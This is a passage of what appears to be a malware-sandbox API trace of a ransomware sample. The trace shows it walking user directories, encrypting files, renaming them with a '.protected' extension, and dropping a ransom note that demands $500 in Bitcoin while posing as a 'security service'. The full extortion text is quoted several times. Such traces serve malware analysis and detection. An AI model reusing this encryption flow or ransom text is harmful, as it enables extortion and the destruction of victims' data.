hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.833] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.833] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.833] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.833] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.833] CloseHandle (hObject=0x14c) returned 1 [0094.835] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Windows") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Program Files") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="Program Files (x86)") returned -1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="$Recycle.bin") returned 1 [0094.835] lstrcmpiW (lpString1="MetaData", lpString2="System Volume Information") returned -1 [0094.835] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData") returned 73 [0094.835] lstrcmpW (lpString1="MetaData", lpString2=".") returned 1 [0094.835] lstrcmpW (lpString1="MetaData", lpString2="..") returned 1 [0094.835] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*") returned 75 [0094.835] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\*", lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0x47ba90 [0094.835] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0094.835] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0094.836] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0094.836] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0094.836] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0094.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.") returned 75 [0094.836] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.836] StrStrIW (lpFirst=".", lpSrch=".protected") returned 0x0 [0094.836] lstrcmpW (lpString1=".", lpString2="RESTORE_FILES.txt") returned -1 [0094.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.836] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.836] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.836] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0094.836] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0094.836] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0094.836] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\..") returned 76 [0094.836] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.836] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.836] StrStrIW (lpFirst="..", lpSrch=".protected") returned 0x0 [0094.836] lstrcmpW (lpString1="..", lpString2="RESTORE_FILES.txt") returned -1 [0094.836] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.837] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.837] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\.." (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0094.837] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Windows") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="Program Files (x86)") returned -1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="$Recycle.bin") returned 1 [0094.837] lstrcmpiW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="System Volume Information") returned -1 [0094.837] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.837] StrStrIW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".protected") returned 0x0 [0094.837] lstrcmpW (lpString1="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpString2="RESTORE_FILES.txt") returned -1 [0094.837] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.844] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.844] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".txt") returned 0x0 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".rar") returned 0x0 [0094.845] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9") returned 106 [0094.845] StrStrW (lpFirst="7B2238AACCEDC3F1FFE8E7EB5F575EC9", lpSrch=".zip") returned 0x0 [0094.846] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0094.850] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffefc, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.851] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x104, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x104, lpOverlapped=0x0) returned 1 [0094.851] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.851] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.851] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.851] CloseHandle (hObject=0x150) returned 1 [0094.851] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected") returned 116 [0094.851] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\7B2238AACCEDC3F1FFE8E7EB5F575EC9.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\7b2238aaccedc3f1ffe8e7eb5f575ec9.protected")) returned 1 [0094.852] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Windows") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="Program Files (x86)") returned -1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="$Recycle.bin") returned 1 [0094.852] lstrcmpiW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="System Volume Information") returned -1 [0094.852] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrIW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".protected") returned 0x0 [0094.853] lstrcmpW (lpString1="94308059B57B3142E455B38A6EB92015", lpString2="RESTORE_FILES.txt") returned -1 [0094.853] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295e76c | out: pbBuffer=0x295e76c) returned 1 [0094.853] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295e794*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295e794*=0x30) returned 1 [0094.853] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x150 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".txt") returned 0x0 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".rar") returned 0x0 [0094.853] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015") returned 106 [0094.853] StrStrW (lpFirst="94308059B57B3142E455B38A6EB92015", lpSrch=".zip") returned 0x0 [0094.853] ReadFile (in: hFile=0x150, lpBuffer=0x4f3bf8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesRead=0x295e7b4*=0x130, lpOverlapped=0x0) returned 1 [0094.854] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0xfffffed0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0094.854] WriteFile (in: hFile=0x150, lpBuffer=0x4f3bf8*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x4f3bf8*, lpNumberOfBytesWritten=0x295e7b4*=0x130, lpOverlapped=0x0) returned 1 [0094.855] SetFilePointerEx (in: hFile=0x150, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0094.855] WriteFile (in: hFile=0x150, lpBuffer=0x295e78c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x295e78c*, lpNumberOfBytesWritten=0x295e7b4*=0x4, lpOverlapped=0x0) returned 1 [0094.855] WriteFile (in: hFile=0x150, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295e7b4*=0x30, lpOverlapped=0x0) returned 1 [0094.855] CloseHandle (hObject=0x150) returned 1 [0094.855] wnsprintfW (in: pszDest=0x4f3bf8, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected") returned 116 [0094.855] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\94308059B57B3142E455B38A6EB92015.protected" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\94308059b57b3142e455b38a6eb92015.protected")) returned 1 [0094.856] FindNextFileW (in: hFindFile=0x47ba90, lpFindFileData=0x295e7d0 | out: lpFindFileData=0x295e7d0) returned 0 [0094.856] FindClose (in: hFindFile=0x47ba90 | out: hFindFile=0x47ba90) returned 1 [0094.856] wnsprintfW (in: pszDest=0x4dfbb0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt") returned 91 [0094.856] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\MetaData\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\metadata\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x14c [0094.858] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.858] WriteFile (in: hFile=0x14c, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295e7b4*=0x53d, lpOverlapped=0x0) returned 1 [0094.859] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.859] WriteFile (in: hFile=0x14c, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295e7b4*=0x2ac, lpOverlapped=0x0) returned 1 [0094.859] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.859] WriteFile (in: hFile=0x14c, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295e7b4, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295e7b4*=0xb1, lpOverlapped=0x0) returned 1 [0094.859] CloseHandle (hObject=0x14c) returned 1 [0094.860] FindNextFileW (in: hFindFile=0x47ba50, lpFindFileData=0x295ea40 | out: lpFindFileData=0x295ea40) returned 0 [0094.860] FindClose (in: hFindFile=0x47ba50 | out: hFindFile=0x47ba50) returned 1 [0094.860] wnsprintfW (in: pszDest=0x4cfb68, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt") returned 82 [0094.860] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\CryptnetUrlCache\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\cryptneturlcache\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd8 [0094.861] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0094.861] WriteFile (in: hFile=0xd8, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ea24*=0x53d, lpOverlapped=0x0) returned 1 [0094.862] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0094.862] WriteFile (in: hFile=0xd8, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ea24*=0x2ac, lpOverlapped=0x0) returned 1 [0094.862] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0094.862] WriteFile (in: hFile=0xd8, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ea24, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ea24*=0xb1, lpOverlapped=0x0) returned 1 [0094.862] CloseHandle (hObject=0xd8) returned 1 [0094.862] FindNextFileW (in: hFindFile=0x47ba10, lpFindFileData=0x295ecb0 | out: lpFindFileData=0x295ecb0) returned 0 [0094.862] FindClose (in: hFindFile=0x47ba10 | out: hFindFile=0x47ba10) returned 1 [0094.863] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt") returned 65 [0094.863] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\LocalLow\\Microsoft\\RESTORE_FILES.txt" (normalized: "c:\\users\\default\\appdata\\locallow\\microsoft\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0094.863] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive 